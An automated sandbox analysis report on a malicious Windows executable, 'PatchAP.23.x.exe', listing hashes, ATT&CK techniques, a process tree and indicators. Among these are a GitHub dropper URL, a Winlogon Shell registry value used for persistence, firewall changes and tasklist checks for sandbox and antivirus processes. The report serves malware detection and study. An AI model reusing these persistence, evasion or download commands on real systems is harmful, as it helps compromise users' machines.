3461d0dafd691ca66a472ff1b3a786c506062766dce32c41eb4850103e810699

Resubmissions

01/08/2023, 13:22

230801-qmctyaga52 10

01/08/2023, 13:15

230801-qhqj8sga32 10

Analysis

max time kernel
149s
max time network
153s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
01/08/2023, 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PatchAP.23.x.exe
Size

1.7MB
MD5

5ce67938a175370ffd35be6aa0dca982
SHA1

2ad8efb5209461a3a8ba25871e8f85e565a92f12
SHA256

3461d0dafd691ca66a472ff1b3a786c506062766dce32c41eb4850103e810699
SHA512

104d04999a4425334e95e7ebab69f4f38d9bbffb0a900d6fdf61052629b291ba8ff1defd691ab1fbeba98c6f0bdfb70cc020237753ba2164b808cbba7c5a3f3e
SSDEEP

24576:EscgHM6TdCH1eASiL5yPSvUwdKKT6CgxUzF7v0FRrqvw07qIdIZiJWUkN3P/qPuW:5c2M6T0H0lPSvJ5WdCBsUwrIzJWrVdvU

Score

10^/10

evasion persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,cmd /C \"start \"\" \"C:\\Windows\\Windows Driver Foundation (WDF).exe\" \""	reg.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	660	powershell.exe
4	660	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
5788	netsh.exe

Executes dropped EXE 12 IoCs

pid	Process
1432	7z2201.exe
864	curl.exe
2648	curl.exe
2112	curl.exe
4532	curl.exe
1368	7z.exe
1428	curl.exe
2284	7z.exe
5140	Windows Driver Foundation (WDF).exe
5196	curl.exe
5668	Local.exe
2740	avast_premium_security_setup_offline.exe

Loads dropped DLL 20 IoCs

pid	Process
1368	7z.exe
2284	7z.exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5668-2858-0x0000000000DB0000-0x0000000001371000-memory.dmp	upx
behavioral1/memory/5668-3277-0x0000000000DB0000-0x0000000001371000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ipinfo.io
8	ipinfo.io
9	ipinfo.io

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\curl.exe	powershell.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\co.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\mk.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ca.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sr-spl.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ru.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\History.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\es.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\lv.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sv.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Uninstall.exe	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\da.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ky.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sq.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\sw.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\th.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\License.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\es.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\7z.exe	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\pt.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\fi.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\mn.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ba.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ar.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\mng.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\descript.ion	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\ps.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\uk.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ku-ckb.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\it.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ba.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\nb.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\sl.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\readme.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\hi.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\io.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\nl.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\nn.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\fr.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\tg.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\hi.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\hy.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\7z.dll	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\gu.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\7z.sfx	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\7z.exe	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\nl.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\nn.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\lij.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\sk.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\eo.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\hy.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ku.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\lt.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\th.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\de.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\mng.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\az.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\bg.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\bn.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\gu.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\mr.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\si.txt	7z2201.exe
File created	C:\Program Files (x86)\7-Zip\Lang\fy.txt	7z2201.exe
File opened for modification	C:\Program Files (x86)\7-Zip\Lang\ka.txt	7z2201.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\QtQuick\Controls.2\ToolBar.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\ToolTip.qml	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\Universal\ItemDelegate.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Universal\PageIndicator.qmlc	7z.exe
File created	C:\Windows\QtQuick\Dialogs\WidgetColorDialog.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Window.2\qmldir	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Desktop\RadioButtonStyle.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Desktop\SwitchStyle.qmlc	7z.exe
File created	C:\Windows\api-ms-win-core-localization-l1-2-1.dll	7z.exe
File created	C:\Windows\qmltooling\qmldbg_debugger.dll	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Material\ScrollBar.qml	7z.exe
File created	C:\Windows\api-ms-win-core-debug-l1-1-0.dll	7z.exe
File created	C:\Windows\Local.exe	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Flat	7z.exe
File created	C:\Windows\QtQuick\Controls\Private\ScrollBar.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Private\MenuItemSubControls.qml	7z.exe
File created	C:\Windows\QtQuick\Extras\DelayButton.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls\Private\MenuContentScroller.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Pane.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Universal\SwipeDelegate.qml	7z.exe
File created	C:\Windows\QtQuick\Dialogs\images\crosshairs.png	7z.exe
File opened for modification	C:\Windows\QtGraphicalEffects\GammaAdjust.qmlc	7z.exe
File created	C:\Windows\QtGraphicalEffects\private\qmldir	7z.exe
File created	C:\Windows\QtQuick\Controls.2\AbstractButton.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\ComboBox.qml	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\SwipeDelegate.qmlc	7z.exe
File created	C:\Windows\api-ms-win-core-fibers-l1-1-0.dll	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Base\StatusIndicatorStyle.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls\Styles\Desktop\MenuBarStyle.qml	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\Material\ToolBar.qml	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Slider.qml	7z.exe
File created	C:\Windows\QtQuick\Controls.2\SwitchDelegate.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Private\ColumnMenuContent.qml	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Desktop\SpinBoxStyle.qml	7z.exe
File created	C:\Windows\platforms\qwindows.dll	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Universal\DialogButtonBox.qmlc	7z.exe
File created	C:\Windows\api-ms-win-core-fibers-l1-1-1.dll	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\Universal\Pane.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls\Styles\Base\SliderStyle.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Material\CheckDelegate.qml	7z.exe
File created	C:\Windows\QtQuick\Controls\Styles\Base\CommonStyleHelper.qml	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Universal\CheckBox.qmlc	7z.exe
File created	C:\Windows\api-ms-win-crt-convert-l1-1-0.dll	7z.exe
File created	C:\Windows\Cache\data8\6\b8f8qfa6.d	7z.exe
File created	C:\Windows\QtQuick\Controls\Private\style.jsc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\RoundButton.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\TextField.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls\StackView.qmlc	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Base\MenuStyle.qmlc	7z.exe
File created	C:\Windows\QtWinExtras\JumpListLink.qml	7z.exe
File created	C:\Windows\QtGraphicalEffects\GammaAdjust.qml	7z.exe
File created	C:\Windows\QtQuick\Controls\Styles\Desktop\SpinBoxStyle.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Material\Frame.qmlc	7z.exe
File created	C:\Windows\QtQuick\Controls.2\Universal\ApplicationWindow.qmlc	7z.exe
File opened for modification	C:\Windows\playlistformats	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Desktop\BusyIndicatorStyle.qml	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Desktop\TreeViewStyle.qml	7z.exe
File created	C:\Windows\QtQuick\Controls.2\RadioButton.qmlc	7z.exe
File opened for modification	C:\Windows\api-ms-win-core-fibers-l1-1-0.dll	7z.exe
File created	C:\Windows\bin\driver_x86\addtap.bat	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls\Styles\Base\images\needle.png	7z.exe
File opened for modification	C:\Windows\QtQuick\Controls.2\Material\DelayButton.qml	7z.exe
File created	C:\Windows\QtTest\qmldir	7z.exe
File opened for modification	C:\Windows\vcruntime140.dll	7z.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6092	timeout.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
4008	tasklist.exe
3100	tasklist.exe
3120	tasklist.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5448	taskkill.exe

Modifies registry class 16 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2201.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2201.exe
Key created	\REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2201.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2201.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2201.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files (x86)\\7-Zip\\7-zip.dll"	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2201.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2201.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2201.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\avast_premium_security_setup_offline.exe:Zone.Identifier	firefox.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5140	Windows Driver Foundation (WDF).exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
660	powershell.exe
660	powershell.exe
660	powershell.exe
420	powershell.exe
420	powershell.exe
420	powershell.exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4860	WMIC.exe
Token: SeSecurityPrivilege	4860	WMIC.exe
Token: SeTakeOwnershipPrivilege	4860	WMIC.exe
Token: SeLoadDriverPrivilege	4860	WMIC.exe
Token: SeSystemProfilePrivilege	4860	WMIC.exe
Token: SeSystemtimePrivilege	4860	WMIC.exe
Token: SeProfSingleProcessPrivilege	4860	WMIC.exe
Token: SeIncBasePriorityPrivilege	4860	WMIC.exe
Token: SeCreatePagefilePrivilege	4860	WMIC.exe
Token: SeBackupPrivilege	4860	WMIC.exe
Token: SeRestorePrivilege	4860	WMIC.exe
Token: SeShutdownPrivilege	4860	WMIC.exe
Token: SeDebugPrivilege	4860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4860	WMIC.exe
Token: SeRemoteShutdownPrivilege	4860	WMIC.exe
Token: SeUndockPrivilege	4860	WMIC.exe
Token: SeManageVolumePrivilege	4860	WMIC.exe
Token: 33	4860	WMIC.exe
Token: 34	4860	WMIC.exe
Token: 35	4860	WMIC.exe
Token: 36	4860	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4860	WMIC.exe
Token: SeSecurityPrivilege	4860	WMIC.exe
Token: SeTakeOwnershipPrivilege	4860	WMIC.exe
Token: SeLoadDriverPrivilege	4860	WMIC.exe
Token: SeSystemProfilePrivilege	4860	WMIC.exe
Token: SeSystemtimePrivilege	4860	WMIC.exe
Token: SeProfSingleProcessPrivilege	4860	WMIC.exe
Token: SeIncBasePriorityPrivilege	4860	WMIC.exe
Token: SeCreatePagefilePrivilege	4860	WMIC.exe
Token: SeBackupPrivilege	4860	WMIC.exe
Token: SeRestorePrivilege	4860	WMIC.exe
Token: SeShutdownPrivilege	4860	WMIC.exe
Token: SeDebugPrivilege	4860	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4860	WMIC.exe
Token: SeRemoteShutdownPrivilege	4860	WMIC.exe
Token: SeUndockPrivilege	4860	WMIC.exe
Token: SeManageVolumePrivilege	4860	WMIC.exe
Token: 33	4860	WMIC.exe
Token: 34	4860	WMIC.exe
Token: 35	4860	WMIC.exe
Token: 36	4860	WMIC.exe
Token: SeDebugPrivilege	4008	tasklist.exe
Token: SeDebugPrivilege	3100	tasklist.exe
Token: SeDebugPrivilege	3120	tasklist.exe
Token: SeDebugPrivilege	660	powershell.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemProfilePrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeProfSingleProcessPrivilege	1080	WMIC.exe
Token: SeIncBasePriorityPrivilege	1080	WMIC.exe
Token: SeCreatePagefilePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeDebugPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeRemoteShutdownPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: 33	1080	WMIC.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe

Suspicious use of SetWindowsHookEx 22 IoCs

pid	Process
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
5140	Windows Driver Foundation (WDF).exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
5140	Windows Driver Foundation (WDF).exe
2740	avast_premium_security_setup_offline.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 1380	1956	PatchAP.23.x.exe	69
PID 1956 wrote to memory of 1380	1956	PatchAP.23.x.exe	69
PID 1380 wrote to memory of 1432	1380	cmd.exe	71
PID 1380 wrote to memory of 1432	1380	cmd.exe	71
PID 1380 wrote to memory of 1432	1380	cmd.exe	71
PID 1380 wrote to memory of 4404	1380	cmd.exe	73
PID 1380 wrote to memory of 4404	1380	cmd.exe	73
PID 1380 wrote to memory of 1008	1380	cmd.exe	72
PID 1380 wrote to memory of 1008	1380	cmd.exe	72
PID 1380 wrote to memory of 2516	1380	cmd.exe	74
PID 1380 wrote to memory of 2516	1380	cmd.exe	74
PID 2516 wrote to memory of 4860	2516	cmd.exe	75
PID 2516 wrote to memory of 4860	2516	cmd.exe	75
PID 1380 wrote to memory of 1728	1380	cmd.exe	77
PID 1380 wrote to memory of 1728	1380	cmd.exe	77
PID 1728 wrote to memory of 4008	1728	cmd.exe	78
PID 1728 wrote to memory of 4008	1728	cmd.exe	78
PID 1380 wrote to memory of 4664	1380	cmd.exe	79
PID 1380 wrote to memory of 4664	1380	cmd.exe	79
PID 1380 wrote to memory of 168	1380	cmd.exe	80
PID 1380 wrote to memory of 168	1380	cmd.exe	80
PID 1380 wrote to memory of 428	1380	cmd.exe	81
PID 1380 wrote to memory of 428	1380	cmd.exe	81
PID 428 wrote to memory of 752	428	cmd.exe	82
PID 428 wrote to memory of 752	428	cmd.exe	82
PID 1380 wrote to memory of 4280	1380	cmd.exe	83
PID 1380 wrote to memory of 4280	1380	cmd.exe	83
PID 4280 wrote to memory of 4884	4280	cmd.exe	84
PID 4280 wrote to memory of 4884	4280	cmd.exe	84
PID 1380 wrote to memory of 3392	1380	cmd.exe	85
PID 1380 wrote to memory of 3392	1380	cmd.exe	85
PID 3392 wrote to memory of 3100	3392	cmd.exe	86
PID 3392 wrote to memory of 3100	3392	cmd.exe	86
PID 1380 wrote to memory of 2784	1380	cmd.exe	87
PID 1380 wrote to memory of 2784	1380	cmd.exe	87
PID 2784 wrote to memory of 3120	2784	cmd.exe	88
PID 2784 wrote to memory of 3120	2784	cmd.exe	88
PID 1380 wrote to memory of 660	1380	cmd.exe	89
PID 1380 wrote to memory of 660	1380	cmd.exe	89
PID 1380 wrote to memory of 2416	1380	cmd.exe	90
PID 1380 wrote to memory of 2416	1380	cmd.exe	90
PID 2416 wrote to memory of 864	2416	cmd.exe	91
PID 2416 wrote to memory of 864	2416	cmd.exe	91
PID 2416 wrote to memory of 864	2416	cmd.exe	91
PID 1380 wrote to memory of 2636	1380	cmd.exe	92
PID 1380 wrote to memory of 2636	1380	cmd.exe	92
PID 2636 wrote to memory of 2648	2636	cmd.exe	93
PID 2636 wrote to memory of 2648	2636	cmd.exe	93
PID 2636 wrote to memory of 2648	2636	cmd.exe	93
PID 1380 wrote to memory of 1080	1380	cmd.exe	94
PID 1380 wrote to memory of 1080	1380	cmd.exe	94
PID 1380 wrote to memory of 4296	1380	cmd.exe	95
PID 1380 wrote to memory of 4296	1380	cmd.exe	95
PID 4296 wrote to memory of 4068	4296	cmd.exe	96
PID 4296 wrote to memory of 4068	4296	cmd.exe	96
PID 1380 wrote to memory of 944	1380	cmd.exe	97
PID 1380 wrote to memory of 944	1380	cmd.exe	97
PID 1380 wrote to memory of 2892	1380	cmd.exe	98
PID 1380 wrote to memory of 2892	1380	cmd.exe	98
PID 2892 wrote to memory of 5052	2892	cmd.exe	99
PID 2892 wrote to memory of 5052	2892	cmd.exe	99
PID 1380 wrote to memory of 4528	1380	cmd.exe	100
PID 1380 wrote to memory of 4528	1380	cmd.exe	100
PID 1380 wrote to memory of 2288	1380	cmd.exe	101

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5776	attrib.exe

C:\Users\Admin\AppData\Local\Temp\PatchAP.23.x.exe
"C:\Users\Admin\AppData\Local\Temp\PatchAP.23.x.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4F6BT1QN.bat" "C:\Users\Admin\AppData\Local\Temp\PatchAP.23.x.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1380
- - C:\Users\Admin\AppData\Local\Temp\qbE5787FC.85\7z2201.exe
    "C:\Users\Admin\AppData\Local\Temp\qbE5787FC.85\7z2201.exe" /S
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Modifies registry class
    PID:1432
- - C:\Windows\system32\msg.exe
    msg *
    3⤵
    PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Premium pending... Please install Avast! "
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path win32_LocalTime Get Day,Month,Year /value
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_LocalTime Get Day,Month,Year /value
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\system32\tasklist.exe
      tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4008
- - C:\Windows\system32\reg.exe
    reg query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:32
    3⤵
    PID:4664
- - C:\Windows\system32\reg.exe
    reg Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:32
    3⤵
    PID:168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\system32\reg.exe
      reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
      4⤵
      PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\system32\reg.exe
      reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
      4⤵
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq ekrn.exe" /fo csv /nh
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Windows\system32\tasklist.exe
      tasklist /fi "imagename eq ekrn.exe" /fo csv /nh
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\system32\tasklist.exe
      tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
